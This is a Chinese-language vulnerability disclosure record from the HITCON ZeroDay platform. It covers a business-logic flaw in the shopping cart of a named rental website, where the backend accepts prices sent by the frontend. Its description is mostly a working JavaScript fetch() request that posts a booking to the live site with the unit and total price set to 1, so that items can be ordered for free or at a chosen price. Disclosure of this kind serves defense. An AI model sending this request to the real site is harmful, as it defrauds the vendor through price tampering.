Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00924
- Vendor: 益百利租賃網
- Title: 益百利租賃網購物車漏洞
- Introduction: 前端傳入金額後端直接取用
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2026/07/15 18:41:28 : 新提交 (由 天 更新此狀態)
- 2026/07/16 10:53:54 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/23 16:48:30 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/23 16:48:30 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/07/23 16:48:30 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/09/14 03:00:09 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00924
- 通報者:Middle0_128 (天)
- 風險:低
- 類型:邏輯漏洞 (Logic Flaws)
參考資料
漏洞說明: OWASP - Testing for business logic
https://www.owasp.org/index.php/Testing_for_business_logic
漏洞說明: CWE-840: Business Logic Errors
https://cwe.mitre.org/data/definitions/840.html
相關網址
敘述
此網站透過前端傳輸金額
並且後端未驗證
造成攻擊者可透過fetch等post方式
Fetch指令範本:
const orderData = new URLSearchParams({
"addPayType": "2",
"addStartDate": "2026-07-06",
"addEndDate": "2026-07-16",
"addCheckDelivery": "1",
"addShippingFee": "102",
"addCounty": "新北市",
"addDistrict": "萬里區",
"addZipCode": "207",
"addAddress": "新北市XX區XX路",
"addStore": "",
"addStoreValue": "",
"addStoreReturn": "",
"addStoreReturnValue": "",
"addQty": "1",
"addPay": "0",
"addAccessoryLength": "0",
"addId": "1050",
"addProdName": "康揚18吋KM-1510骨科輪椅",
"addStoreName": "",
"addStoreReturnName": "",
"addDeposit": "1",
"addDays": "11",
"addUnits": "1",
"addUnitPrice": "1",
"addTotalPrice": "1",
"addWaiting": "false",
"addReturnStoreFeeCategory": "1",
"addReturnStoreFee": "0",
"addShippingFeeBack": "0",
"addShippingFeeGo": "0",
"addShippingFeeReduce": "0",
"addShippingFeeValue": "0",
"addShippingFeeId": "102",
"addShippingFeeName": "板橋",
"txtCSRF": "-QntoBi}fR}4NE1sdfy7" // 這裡放csrf
});
// 標頭
const requestHeaders = {
"accept": "application/json, text/javascript, /; q=0.01",
"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"sec-ch-ua": "\"Google Chrome\";v=\"149\", \"Chromium\";v=\"149\", \"Not)A;Brand\";v=\"24\"",
"sec-ch-ua-mobile": "?0",
"sec-ch-ua-platform": "\"Windows\"",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"x-requested-with": "XMLHttpRequest"
};
// Fetch
fetch("https://rent4you.100power.com.tw/webFrontend/booking.action", {
"headers": requestHeaders,
"referrer": "https://rent4you.100power.com.tw/webFrontend/rent-item.jsp?id=1050",
"body": orderData.toString(),
"method": "POST",
"mode": "cors",
"credentials": "include"
})
.then(response => response.json())
.then(data => console.log("結果:", data))
.catch(error => console.error("發生錯誤:", error));
來達到零元購或是自行定價